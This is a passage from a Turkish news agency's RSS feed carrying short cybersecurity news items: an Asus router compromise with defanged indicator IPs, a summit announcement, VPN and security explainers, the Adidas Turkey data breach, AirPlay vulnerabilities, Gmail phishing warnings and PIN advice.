<p data-start="2459" data-end="2798">Eğer bu tür bir anahtar veya port 53282 üzerinden açık bir SSH bağlantısı varsa, cihaz yüksek olasılıkla saldırıya uğramış demektir. Bu durumda, kullanıcıların ilgili anahtarı ve port ayarını manuel olarak silmeleri gerekiyor. Ayrıca aşağıdaki IP adreslerinden gelen bağlantıların sistem günlüklerinde yer alıp almadığı kontrol edilmeli:</p>
<ul data-start="2799" data-end="2878">
<li data-start="2799" data-end="2818">
<p data-start="2801" data-end="2818">101.99.91[.]151</p>
</li>
<li data-start="2819" data-end="2838">
<p data-start="2821" data-end="2838">101.99.94[.]173</p>
</li>
<li data-start="2839" data-end="2859">
<p data-start="2841" data-end="2859">79.141.163[.]179</p>
</li>
<li data-start="2860" data-end="2878">
<p data-start="2862" data-end="2878">111.90.146[.]237</p>
</li>
</ul>
<p data-start="2880" data-end="3048">Uzmanlar, yalnızca Asus değil tüm router kullanıcılarının düzenli yazılım güncellemeleri yapmalarını ve varsayılan yönetici şifrelerini değiştirmelerini tavsiye ediyor.</p>
<p data-start="3050" data-end="3284" data-is-last-node="" data-is-only-node=""><strong data-start="3050" data-end="3062"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Dijital Tehditler, Yapay Zekâ ve Yerlileşme Gündemiyle 8. Siber Güvenlik Zirvesi Ankara'da Gerçekleştirilecek</title>
            <link>https://cumha.com.tr/dijital-tehditler-yapay-zeka-ve-yerlilesme-gundemiyle-8-siber-guvenlik-zirvesi-ankarada-gerceklestirilecek</link>
            <guid>https://cumha.com.tr/dijital-tehditler-yapay-zeka-ve-yerlilesme-gundemiyle-8-siber-guvenlik-zirvesi-ankarada-gerceklestirilecek</guid>
            <description><![CDATA[ Türkiye Bilişim Derneği&#039;nin ev sahipliğinde 12 Haziran 2025’te BTK Ana Konferans Salonu&#039;nda düzenlenecek 8. Siber Güvenlik Ekosisteminin Geliştirilmesi Zirvesi, yapay zekâ, kritik altyapılar, yerli teknolojiler ve siber güvenlik girişimciliği gibi konuların ele alınacağı yoğun bir programla sektörün önde gelen isimlerini bir araya getirecek. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_683433e82cbe1.webp" length="23938" type="image/webp"/>
            
            <pubDate>Mon, 26 May 2025 12:28:22 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords></media:keywords>

                            <content:encoded>
                                            <![CDATA[<p data-start="491" data-end="910"><strong data-start="512" data-end="572">Siber güvenlik ekosisteminin gelişimi masaya yatırılacak</strong><br data-start="572" data-end="575">Türkiye Bilişim Derneği tarafından organize edilen 8. Siber Güvenlik Ekosisteminin Geliştirilmesi Zirvesi, 12 Haziran 2025 tarihinde Ankara’daki BTK Ana Konferans Salonu'nda gerçekleştirilecek. Etkinlik, kamu, özel sektör ve akademiden uzman isimlerin katılımıyla siber güvenliğin geleceğine dair kritik başlıkları tartışmaya açacak.</p>
<p data-start="912" data-end="1209"><strong data-start="912" data-end="961">Protokol ve sponsor konuşmalarıyla başlayacak</strong><br data-start="961" data-end="964">Zirve, saat 09.00’da kayıt süreciyle başlayacak. 09.45-11.00 saatleri arasında yapılacak protokol konuşmalarında Türkiye Bilişim Derneği Genel Başkanı Kenan Altınsaat ve T.C. Sanayi ve Teknoloji Bakan Yardımcısı Zekeriya Coştu konuşma yapacak.</p>
<p data-start="1211" data-end="1289">11.00-11.15 arasında platin sponsor SAYTEC adına CTO Yakup Saygın konuşacak.</p>
<p data-start="1291" data-end="1780"><strong data-start="1291" data-end="1346">Kritik altyapılar ve yapay zekâ tehditleri gündemde</strong><br data-start="1346" data-end="1349">Saat 11.15’te başlayacak ilk oturumda, 'Kritik Altyapılarda Sessiz Savaş: Dijital Saldırılar, Fiziksel Etkiler, Yapay Zekânın Getirdiği Tehditler' başlığı altında çeşitli alanlardan uzmanlar görüşlerini paylaşacak. Panelin moderatörlüğünü SAU Kritik Altyapılar Ulusal Test Yatağı Merkezi Koordinatörü Prof. Dr. İbrahim Özçelik üstlenecek. Panelde; Ahmet Pekel, Can Demirel, Cem Dursun ve Mahmut Küçük konuşmacı olarak yer alacak.</p>
<p data-start="1782" data-end="2055"><strong data-start="1782" data-end="1820">Yerlileşme ve girişimcilik vurgusu</strong><br data-start="1820" data-end="1823">Öğle yemeğinin ardından saat 13.30’da Türkiye Bilişim Derneği tarafından verilen Siber Güvenlik Ekosistemine Katkı Ödülleri sahiplerini bulacak. 14.00’te Altın Sponsor İNDAS Cybersecurity Kurucu Ortağı Yavuz Aydın konuşma yapacak.</p>
<p data-start="2057" data-end="2233">Aynı saatlerde TED Üniversitesi’nden Prof. Dr. Murat Karakaya, ‘Büyük Dil Modellerinin İmkân ve Kabiliyetleri ile Getirdiği Riskler’ konulu eğitim oturumunu gerçekleştirecek.</p>
<p data-start="2235" data-end="2611">14.15’te başlayacak ikinci panelde ise ‘Siber Savunmada Yerlileşme: Sorunlar ve Fırsatlar; Girişimci, Yatırımcı ve Kamu Perspektifi’ başlığı altında sektörel değerlendirmeler yapılacak. Panelin moderatörlüğünü SSB Türkiye Siber Güvenlik Kümelenmesi Genel Koordinatörü Alpaslan Kesici üstlenecek. Konuşmacılar arasında Hakan Terzioğlu, İsmail Güneş ve Savaş Ergen yer alacak.</p>
<p data-start="2613" data-end="2826"><strong data-start="2613" data-end="2658">Eğitimler ve TEDx konuşmaları ile kapanış</strong><br data-start="2658" data-end="2661">Saat 15.00’te Ankara Üniversitesi’nden Öğr. Gör. Muhammed Saadettin Kaya, 'Mahremiyet Koruyucu Tekniklerin Yapay Zekâ Eğitiminde Kullanımı' konulu eğitimi sunacak.</p>
<p data-start="2828" data-end="2983">15.45-16.45 saatleri arasında TEDx konuşmaları gerçekleştirilecek. Zirve, 16.45-17.15 saatleri arasında yapılacak kapanış ve ödül töreni ile sona erecek.</p>
<p><a href="https://www.siberguvenlikzirvesi.org.tr/2025/kayit">Kayıt Adresi</a></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>VPN kullanımı artıyor: İnternet trafiğini şifreleyerek verileri koruma altına alıyor</title>
            <link>https://cumha.com.tr/vpn-kullanimi-artiyor-internet-trafigini-sifreleyerek-verileri-koruma-altina-aliyor</link>
            <guid>https://cumha.com.tr/vpn-kullanimi-artiyor-internet-trafigini-sifreleyerek-verileri-koruma-altina-aliyor</guid>
            <description><![CDATA[ Siber tehditlerin arttığı günümüzde kullanıcılar, VPN teknolojisiyle internet üzerindeki veri trafiğini şifreleyerek güvenli bağlantılar kuruyor. Peki VPN tam olarak nasıl çalışıyor ve hangi durumlarda kullanılması öneriliyor? ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_6830521e07707.webp" length="8580" type="image/webp"/>
            
            <pubDate>Fri, 23 May 2025 13:47:03 +0300</pubDate>
            <dc:creator>Nurullah Şeker</dc:creator>
            <media:keywords>VPN nedir ve nasıl çalışır, VPN internet güvenliğini nasıl sağlar, VPN hangi durumlarda kullanılmalı, VPN ile hangi içeriklere erişim mümkün</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="355" data-end="358"><strong data-start="358" data-end="388">VPN nedir ve ne işe yarar?</strong><br data-start="388" data-end="391">Sanal Özel Ağ (VPN), internet kullanıcılarının verilerini korumak amacıyla geliştirilen bir güvenlik teknolojisidir. VPN, kullanıcı ile erişmek istediği internet sitesi arasındaki bağlantıyı şifreleyerek, aradaki tüm veri trafiğinin üçüncü kişiler tarafından izlenmesini ya da çalınmasını engeller.</p>
<p></p>
<p data-start="691" data-end="1001"><strong data-start="691" data-end="731">Veri güvenliği ve gizliliği sağlıyor</strong><br data-start="731" data-end="734">Özellikle halka açık Wi-Fi ağlarında yapılan internet bağlantıları, kötü niyetli kişiler tarafından kolaylıkla takip edilebilmektedir. VPN kullanımı, bu tür riskleri minimize ederek kullanıcının IP adresini gizler, veri paketlerini şifreler ve kimlik koruması sağlar.</p>
<p data-start="1003" data-end="1306"><strong data-start="1003" data-end="1038">Farklı kullanım alanları mevcut</strong><br data-start="1038" data-end="1041">VPN’ler sadece güvenlik için değil, aynı zamanda coğrafi engelleri aşmak ve erişimi kısıtlanmış içeriklere ulaşmak için de kullanılmaktadır. Örneğin, bazı ülkelerde yasaklı olan sosyal medya platformlarına ya da yayın servislerine VPN sayesinde erişim sağlanabilir.</p>
<p data-start="1308" data-end="1571"><strong data-start="1308" data-end="1350">Kurulum ve kullanım kolaylığı sağlıyor</strong><br data-start="1350" data-end="1353">VPN hizmetleri, mobil cihazlardan masaüstü bilgisayarlara kadar geniş bir platformda desteklenmektedir. Çoğu VPN sağlayıcısı, kullanıcı dostu arayüzleri sayesinde hızlı bir kurulum ve kolay kullanım imkânı sunmaktadır.</p>
<p data-start="1573" data-end="1728"></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Dijital Dünyanın Kalkanı: Siber Güvenlik Neden Her Zamankinden Daha Önemli?</title>
            <link>https://cumha.com.tr/dijital-dunyanin-kalkani-siber-guvenlik-neden-her-zamankinden-daha-onemli</link>
            <guid>https://cumha.com.tr/dijital-dunyanin-kalkani-siber-guvenlik-neden-her-zamankinden-daha-onemli</guid>
            <description><![CDATA[ Siber güvenlik, dijital sistemlerin dış tehditlerden korunması için hayati öneme sahip bir savunma hattı sunuyor. Kişisel verilerden kritik altyapılara kadar her şeyi hedef alan siber saldırılara karşı alınan önlemler, kurumlar ve bireyler için artık bir lüks değil zorunluluk. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_68304c2802e1d.webp" length="22356" type="image/webp"/>
            
            <pubDate>Fri, 23 May 2025 13:21:36 +0300</pubDate>
            <dc:creator>Nurullah Şeker</dc:creator>
            <media:keywords>Siber güvenlik neden önemlidir, dijital sistemleri korumak için hangi yöntemler kullanılıyor, siber tehditler hangi alanları hedef alıyor, kritik altyapılar siber saldırılardan nasıl etkileniyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="393" data-end="396"><strong data-start="396" data-end="421">Siber güvenlik nedir?</strong><br data-start="421" data-end="424">Siber güvenlik, bilgisayar sistemlerini, ağları, yazılımları ve verileri yetkisiz erişim, zarar, değişiklik veya çalınma gibi tehditlere karşı koruma sürecidir. Bu koruma, bireylerin kişisel cihazlarından devletlerin kritik altyapılarına kadar uzanan geniş bir dijital alanı kapsar.</p>
<p></p>
<p data-start="708" data-end="1128"><strong data-start="708" data-end="737">Tehditler giderek artıyor</strong><br data-start="737" data-end="740">Günümüzde dijitalleşmenin hızla yayılması, siber saldırganlar için daha fazla hedef yaratmaktadır. Fidye yazılımlar, kimlik avı saldırıları, veri sızıntıları ve devlet destekli siber casusluk faaliyetleri, en sık karşılaşılan tehdit türleri arasında yer alıyor. Bu tehditler yalnızca maddi zarara yol açmakla kalmıyor, aynı zamanda kişisel mahremiyeti ve ulusal güvenliği de riske atıyor.</p>
<p data-start="1130" data-end="1550"><strong data-start="1130" data-end="1164">Koruma yöntemleri çeşitleniyor</strong><br data-start="1164" data-end="1167">Gelişen tehditlere karşı savunma stratejileri de evriliyor. Antivirüs yazılımları, güvenlik duvarları, çok faktörlü kimlik doğrulama sistemleri ve yapay zekâ destekli izleme teknolojileri, siber güvenlik alanında sıkça kullanılan önlemler arasında. Ayrıca çalışanların bilinçlendirilmesi ve düzenli güvenlik eğitimleri de saldırıların başarı oranını düşürmede önemli bir rol oynuyor.</p>
<p data-start="1552" data-end="1927"><strong data-start="1552" data-end="1581">Kritik altyapılar hedefte</strong><br data-start="1581" data-end="1584">Enerji, ulaşım, sağlık gibi sektörlerde kullanılan dijital altyapılar, siber saldırılar açısından öncelikli hedefler arasında yer alıyor. Bu altyapıların güvenliği, kamu güvenliği ve ekonomik istikrar açısından büyük önem taşıyor. Bu nedenle hem özel sektör hem de kamu kurumları siber güvenliğe yatırım yapma konusunda daha hassas davranıyor.</p>
<p data-start="1929" data-end="2165" data-is-last-node="" data-is-only-node=""></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Adidas Türkiye'de 544 Binden Fazla Kişisel Veri Sızdırıldı: KVKK Resmen Duyurdu</title>
            <link>https://cumha.com.tr/adidas-turkiyede-544-binden-fazla-kisisel-veri-sizdirildi-kvkk-resmen-duyurdu</link>
            <guid>https://cumha.com.tr/adidas-turkiyede-544-binden-fazla-kisisel-veri-sizdirildi-kvkk-resmen-duyurdu</guid>
            <description><![CDATA[ Adidas&#039;ın global sistemine yapılan siber saldırı sonucu Türkiye&#039;deki 544.395 kullanıcının kişisel verileri sızdırıldı. KVKK, ihlal sonrası yapılan bildirim ve soruşturma sürecine dair detaylı açıklama yaptı. E-posta, doğum tarihi, telefon numarası ve daha fazlası tehlikede. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_683049adcb18c.webp" length="29394" type="image/webp"/>
            
            <pubDate>Fri, 23 May 2025 13:11:08 +0300</pubDate>
            <dc:creator>Burak Ege Yilmaz</dc:creator>
            <media:keywords>Adidas veri ihlali ne zaman gerçekleşti, kaç kişi etkilendi, hangi kişisel veriler sızdırıldı, KVKK ne tür bir açıklama yaptı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="406" data-end="409"><strong data-start="409" data-end="477">Adidas Türkiye’ye siber saldırı: 544 binden fazla kişi etkilendi</strong><br data-start="477" data-end="480">Kişisel Verileri Koruma Kurumu (KVKK), Adidas Türkiye'ye yönelik gerçekleşen siber saldırı sonucunda, toplamda 544.395 kişinin kişisel bilgilerinin sızdırıldığını kamuoyuna duyurdu. Saldırının Adidas’ın bağlı bulunduğu global altyapı üzerinden yapıldığı ve Türkiye’deki kullanıcıları doğrudan etkilediği bildirildi.</p>
<p></p>
<p data-start="797" data-end="1237"><strong data-start="797" data-end="832">İhlal 17 Mayıs’ta tespit edildi</strong><br data-start="832" data-end="835">Adidas Spor Malzemeleri Satış ve Pazarlama A.Ş. tarafından 17 Mayıs 2025 tarihinde Kuruma yapılan bildirimde, ihlalin bir çalışan tarafından Siber Güvenlik Olaylarına Müdahale Ekibine iletilen bir e-posta ile fark edildiği belirtildi. Söz konusu e-postada, üçüncü bir şahsın müşteri verilerine eriştiği iddia edildi ve eki dosyada yer alan bilgilerin büyük olasılıkla Adidas’a ait olduğu tespit edildi.</p>
<p data-start="1239" data-end="1598"><strong data-start="1239" data-end="1281">Sızdırılan veriler arasında neler var?</strong><br data-start="1281" data-end="1284">KVKK'nın açıklamasına göre, sızdırılan bilgiler arasında kullanıcıların isimleri, e-posta adresleri, cinsiyet bilgileri, doğum tarihleri ve telefon numaraları yer alıyor. Ancak her kullanıcının tüm veri tiplerinden etkilenmediği, bazı kullanıcıların yalnızca belirli bilgileri sızdırılmış olabileceği ifade edildi.</p>
<p data-start="1600" data-end="1834"><strong data-start="1600" data-end="1638">Adidas’tan teknik açıklama gelmedi</strong><br data-start="1638" data-end="1641">Adidas tarafından yürütülen teknik analiz ve güvenlik önlemlerine dair herhangi bir bilgi henüz paylaşılmadı. Saldırının kaynağı ve yöntemine ilişkin soruşturmanın ise halen sürdüğü belirtildi.</p>
<p data-start="1836" data-end="2132"><strong data-start="1836" data-end="1881">KVKK açıklamasına göre süreç devam ediyor</strong><br data-start="1881" data-end="1884">Kurum, Kişisel Verilerin Korunması Kanunu’nun 12. maddesine dayanarak 22 Mayıs 2025 tarihli kararla, söz konusu veri ihlali bildirisinin internet sitesinde yayımlanmasına karar verdi. Sürece ilişkin gelişmelerin kamuoyuyla paylaşılacağı belirtildi.</p>
<p data-start="2134" data-end="2278"><strong data-start="2134" data-end="2146"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Apple’dan kritik uyarı: AirPlay özelliği kapatılmazsa cihazlar tehlikede</title>
            <link>https://cumha.com.tr/appledan-kritik-uyari-airplay-oezelligi-kapatilmazsa-cihazlar-tehlikede</link>
            <guid>https://cumha.com.tr/appledan-kritik-uyari-airplay-oezelligi-kapatilmazsa-cihazlar-tehlikede</guid>
            <description><![CDATA[ Apple, AirPlay protokolünde keşfedilen 23 güvenlik açığı nedeniyle iPhone kullanıcılarını uyardı. Şirket, kullanıcıların AirPlay özelliğini kapatmalarını ve cihazlarını güncellemelerini tavsiye etti. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_683023cee90d0.webp" length="11584" type="image/webp"/>
            
            <pubDate>Fri, 23 May 2025 10:29:28 +0300</pubDate>
            <dc:creator>Nurullah Şeker</dc:creator>
            <media:keywords>AirPlay açığı nedir, iPhone kullanıcıları AirPlay’i nasıl kapatır, Apple AirPlay güvenlik açıklarına karşı ne öneriyor, AirBorne güvenlik açığı hangi cihazları etkiliyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="328" data-end="331"><strong data-start="331" data-end="388">Apple’dan AirPlay güvenlik açığına karşı önemli uyarı</strong><br data-start="388" data-end="391">Apple, AirPlay özelliğinde ortaya çıkan çok sayıda güvenlik açığı nedeniyle iPhone kullanıcılarına kritik bir uyarıda bulundu. Şirket, "AirBorne" adı verilen bu açıklar sebebiyle AirPlay kullanımının derhal durdurulmasını önerdi.</p>
<p></p>
<p data-start="624" data-end="938"><strong data-start="624" data-end="664">23 ayrı güvenlik açığı tespit edildi</strong><br data-start="664" data-end="667">Siber güvenlik firması Oligo’nun yaptığı araştırmaya göre, Apple’ın AirPlay protokolünde 23’e kadar güvenlik açığı bulunuyor. Bu açıkların büyük çoğunluğu, üçüncü taraf cihazların AirPlay uyumluluğu için kullanılan Yazılım Geliştirme Kiti (SDK) üzerinden kaynaklanıyor.</p>
<p data-start="940" data-end="1284"><strong data-start="940" data-end="991">Uzaktan erişim ve sıfır tıklama saldırısı riski</strong><br data-start="991" data-end="994">Oligo CTO’su Gal Elbaz, bu açıkların bilgisayar korsanları tarafından sıfır tıklamalı saldırılar düzenlemek için kullanılabileceğini belirtti. Saldırganlar, aynı Wi-Fi ağına bağlı cihazlara kullanıcı etkileşimi olmadan erişebiliyor, kötü amaçlı yazılım yükleyebiliyor ve veri çalabiliyor.</p>
<p data-start="1286" data-end="1586"><strong data-start="1286" data-end="1332">Apple'dan kullanıcılarına güvenlik çağrısı</strong><br data-start="1332" data-end="1335">Apple, bu güvenlik açıklarına karşı alınabilecek en etkili önlemin, AirPlay özelliğinin devre dışı bırakılması ve iPhone'ların en son sürüme güncellenmesi olduğunu açıkladı. Ayrıca yalnızca güvenilir kaynaklardan dosya alınması gerektiği vurgulandı.</p>
<p data-start="1588" data-end="1776"><strong data-start="1588" data-end="1600"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Google'dan Gmail kullanıcılarına kritik uyarı: 'no-reply' adresinden gelen bu e-postalara dikkat</title>
            <link>https://cumha.com.tr/googledan-gmail-kullanicilarina-kritik-uyari-no-reply-adresinden-gelen-bu-e-postalara-dikkat</link>
            <guid>https://cumha.com.tr/googledan-gmail-kullanicilarina-kritik-uyari-no-reply-adresinden-gelen-bu-e-postalara-dikkat</guid>
            <description><![CDATA[ Google, 2 milyar kullanıcıyı etkileyebilecek yeni bir dolandırıcılık yöntemi konusunda uyardı. Şirket, &#039;no-reply@accounts.google.com&#039; adresinden gelmiş gibi görünen sahte e-postaların kullanıcıları hedef aldığını belirterek, bu mesajların açılmadan silinmesi gerektiğini vurguladı. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_6830176ce614b.webp" length="16200" type="image/webp"/>
            
            <pubDate>Fri, 23 May 2025 09:40:07 +0300</pubDate>
            <dc:creator>Cansu Kırten</dc:creator>
            <media:keywords>no-reply e-postası nedir, Google sahte e-postaları nasıl tanıyor, OAuth sistemi nasıl suistimal ediliyor, Gmail kullanıcıları kendilerini nasıl koruyabilir</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="422" data-end="425"><strong data-start="425" data-end="472">Gmail kullanıcılarına siber saldırı uyarısı</strong><br data-start="472" data-end="475">Google, dünya genelinde yaklaşık 2 milyar kullanıcıyı hedef alan yeni bir siber saldırı dalgasına karşı kullanıcılarını uyardı. Şirketten yapılan açıklamaya göre, dolandırıcılar, ‘<a data-start="655" data-end="683" class="cursor-pointer" rel="noopener">no-reply@accounts.google.com</a>’ adresinden gönderilmiş gibi görünen sahte e-postalarla kullanıcıları kandırmaya çalışıyor.</p>
<p></p>
<p data-start="777" data-end="1141"><strong data-start="777" data-end="824">Sahte güvenlik mesajlarıyla tuzak kuruluyor</strong><br data-start="824" data-end="827">Bu saldırı yöntemi, “no-reply e-posta saldırısı” olarak adlandırılıyor. Kullanıcılara, hesaplarıyla ilgili sözde “yasal süreç” gerekçesiyle bilgi talep eden e-postalar gönderiliyor. Mesajlarda yer alan bağlantılar, sahte bir Google destek sayfasına yönlendirme yaparak kişisel bilgilerin paylaşılması hedefleniyor.</p>
<p data-start="1143" data-end="1577"><strong data-start="1143" data-end="1187">Bağlantılara tıklamak büyük risk taşıyor</strong><br data-start="1187" data-end="1190">Siber güvenlik uzmanları, bu e-postalardaki bağlantılara tıklanmasının ciddi sonuçlara yol açabileceğini belirtiyor. Bu bağlantılar aracılığıyla zararlı yazılımlar indirilebiliyor ya da parola hırsızlığına neden olan sahte sayfalara erişim sağlanabiliyor. Bazı durumlarda, sadece bağlantıdaki belgelerin görüntülenmesi bile Gmail ve Google Drive içeriklerine kısmi erişim sağlayabiliyor.</p>
<p data-start="1579" data-end="1981"><strong data-start="1579" data-end="1633">OAuth sistemi üzerinden yetkisiz erişim sağlanıyor</strong><br data-start="1633" data-end="1636">Yazılım geliştiricisi Nick Johnson, saldırganların Google’ın OAuth sistemini suistimal ettiğini açıkladı. Bu yöntemle sahte uygulamalar oluşturularak, kullanıcıdan bu uygulamalara erişim izni vermesi isteniyor. Johnson, bu tekniği “en tehlikeli tuzak” olarak tanımlıyor ve yalnızca resmi Google bildirimlerine güvenilmesi gerektiğini vurguluyor.</p>
<p data-start="1983" data-end="2418"><strong data-start="1983" data-end="2015">Google’dan korunma önerileri</strong><br data-start="2015" data-end="2018">Google, ‘güvenlik’, ‘hesap doğrulama’ ya da ‘yasal işlem’ gibi aciliyet içeren ifadelerle gelen e-postalara karşı dikkatli olunması gerektiğini belirtti. Bu tür mesajlar genellikle kullanıcıları korkutarak harekete geçirmeyi amaçlayan dolandırıcılık girişimleridir. Şirket, kullanıcıların e-posta gönderen adresini mutlaka kontrol etmesi ve şüpheli e-postaları açmadan silmesi gerektiğini ifade etti.</p>
<p data-start="2420" data-end="2515">Ayrıca Google, kullanıcıların hesap güvenliğini artırmak için şu iki adımı atmasını öneriyor:</p>
<ul data-start="2516" data-end="2721">
<li data-start="2516" data-end="2585">
<p data-start="2518" data-end="2585">İki Aşamalı Kimlik Doğrulama (2FA) özelliğini aktif hale getirin.</p>
</li>
<li data-start="2586" data-end="2721">
<p data-start="2588" data-end="2721">Gmail hesabınıza erişimi olan üçüncü taraf uygulamaları düzenli olarak kontrol edin ve ihtiyaç dışı olanların erişim iznini kaldırın.</p>
</li>
</ul>
<p data-start="2723" data-end="2893"></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Milyonların Yaptığı Şifre Hataları Kartları Tehlikeye Atıyor: Bu Rakamları Sakın Kullanmayın</title>
            <link>https://cumha.com.tr/milyonlarin-yaptigi-sifre-hatalari-kartlari-tehlikeye-atiyor-bu-rakamlari-sakin-kullanmayin</link>
            <guid>https://cumha.com.tr/milyonlarin-yaptigi-sifre-hatalari-kartlari-tehlikeye-atiyor-bu-rakamlari-sakin-kullanmayin</guid>
            <description><![CDATA[ Kredi kartı kullanımının arttığı günümüzde, basit ve tahmin edilebilir şifreler kullanıcıları dolandırıcılara karşı savunmasız bırakıyor. Uzmanlar, &#039;1234&#039; ve doğum yılı gibi rakamların şifrelerde kesinlikle yer almaması gerektiğini vurguluyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_682f2654cba87.webp" length="31556" type="image/webp"/>
            
            <pubDate>Thu, 22 May 2025 16:28:07 +0300</pubDate>
            <dc:creator>Nurullah Şeker</dc:creator>
            <media:keywords>Kart şifresi seçerken hangi hatalar yapılıyor, en riskli şifre kombinasyonları hangileri, şifre güvenliği için uzmanlar ne öneriyor, otomatik yazılımlar nasıl çalışıyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="380" data-end="383"><strong data-start="383" data-end="439">Kart kullanımı artarken güvenlik riskleri de büyüyor</strong><br data-start="439" data-end="442">Kredi kartlarının kullanım oranı her geçen gün artış gösteriyor. Özellikle online alışveriş ve temassız ödeme sistemlerinin yaygınlaşması, kartları hem kolaylık hem de siber saldırılar açısından gündeme taşıyor.</p>
<p></p>
<p data-start="657" data-end="995"><strong data-start="657" data-end="704">Kart şifreleri siber saldırıların hedefinde</strong><br data-start="704" data-end="707">Nakit paranın alım gücünün azaldığı günümüzde, kredi kartları günlük hayatın ayrılmaz bir parçası haline geldi. Bu durum, kart şifrelerinin güvenliğini her zamankinden daha önemli hale getiriyor. Ancak uzmanlar, kullanıcıların büyük kısmının ciddi şifre hataları yaptığını ifade ediyor.</p>
<p data-start="997" data-end="1403"><strong data-start="997" data-end="1062">En çok tercih edilen şifreler hackerların ilk denemesi oluyor</strong><br data-start="1062" data-end="1065">Siber güvenlik araştırmalarına göre, en çok tercih edilen 4 haneli şifreler arasında “1234”, “0000”, “1111” ve doğum yılı gibi kolay tahmin edilebilecek rakamlar yer alıyor. Bu tür kombinasyonlar, dolandırıcılar tarafından ilk denenenler arasında bulunuyor. Otomatik yazılımlar sayesinde bu tarz şifreler saniyeler içinde çözülebiliyor.</p>
<p data-start="1405" data-end="1697"><strong data-start="1405" data-end="1446">Uzmanlardan güvenli şifre tavsiyeleri</strong><br data-start="1446" data-end="1449">Uzmanlar, kart şifresi belirlerken tahmin edilmesi zor ve rastgele sayı kombinasyonlarının kullanılmasını öneriyor. Ayrıca, şifrenin telefon PIN koduyla aynı olmaması ve düzenli aralıklarla değiştirilmesi de güvenlik açısından kritik öneme sahip.</p>
<p data-start="1699" data-end="1882"></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>iPhone'lar AirPlay açığıyla tehdit altında: Uzaktan hack riski büyüyor</title>
            <link>https://cumha.com.tr/iphonelar-airplay-acigiyla-tehdit-altinda-uzaktan-hack-riski-buyuyor</link>
            <guid>https://cumha.com.tr/iphonelar-airplay-acigiyla-tehdit-altinda-uzaktan-hack-riski-buyuyor</guid>
            <description><![CDATA[ Apple, &#039;AirBorne&#039; adı verilen kritik bir güvenlik açığı nedeniyle iPhone kullanıcılarını uyardı. AirPlay özelliğinde keşfedilen 23&#039;e yakın açık, sıfır tıklama saldırılarıyla cihazların ele geçirilmesine yol açabiliyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_682f252fbf88e.webp" length="23140" type="image/webp"/>
            
            <pubDate>Thu, 22 May 2025 16:23:19 +0300</pubDate>
            <dc:creator>Nurullah Şeker</dc:creator>
            <media:keywords>iPhone AirPlay açığı nedir, sıfır tıklama saldırısı ne anlama geliyor, Apple kullanıcılarından ne yapmalarını istiyor, AirPlay özelliği nasıl devre dışı bırakılır</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p data-start="315" data-end="638"><strong data-start="332" data-end="369">Apple'dan kritik güvenlik uyarısı</strong><br data-start="369" data-end="372">Teknoloji şirketi Apple, iPhone kullanıcılarını doğrudan etkileyen önemli bir güvenlik açığı hakkında açıklamada bulundu. Şirketin uyarısına göre, AirPlay özelliğinde tespit edilen kritik açıklar, kullanıcıların cihazlarını siber saldırılara açık hale getirebiliyor.</p>
<p data-start="640" data-end="994"><strong data-start="640" data-end="673">23'e yakın açık tespit edildi</strong><br data-start="673" data-end="676">Siber güvenlik firması Oligo tarafından yapılan araştırmada, Apple'ın AirPlay protokolünde 23 farklı güvenlik açığı bulunduğu belirlendi. Bu açıkların büyük kısmının, üçüncü taraf üreticilerin AirPlay ile uyumlu hale getirdiği cihazlarda kullanılan AirPlay Yazılım Geliştirme Kiti (SDK) içinde yer aldığı ifade edildi.</p>
<p data-start="996" data-end="1459"><strong data-start="996" data-end="1057">Cihazlar kullanıcı etkileşimi olmadan ele geçirilebiliyor</strong><br data-start="1057" data-end="1060">Oligo'nun CTO'su Gal Elbaz, keşfedilen açıkların 'sıfır tıklama' (zero-click) saldırılarına olanak sağladığını belirtti. Bu durum, siber korsanların kullanıcı herhangi bir işlem yapmadan cihazlara sızmasına, kötü amaçlı yazılım yüklemesine veya veri çalmasına neden olabiliyor. Açıkların çoğu zaman yamanmasının zor olduğu, bazı cihazlarda ise bu yamaların hiçbir zaman yapılmayabileceği vurgulandı.</p>
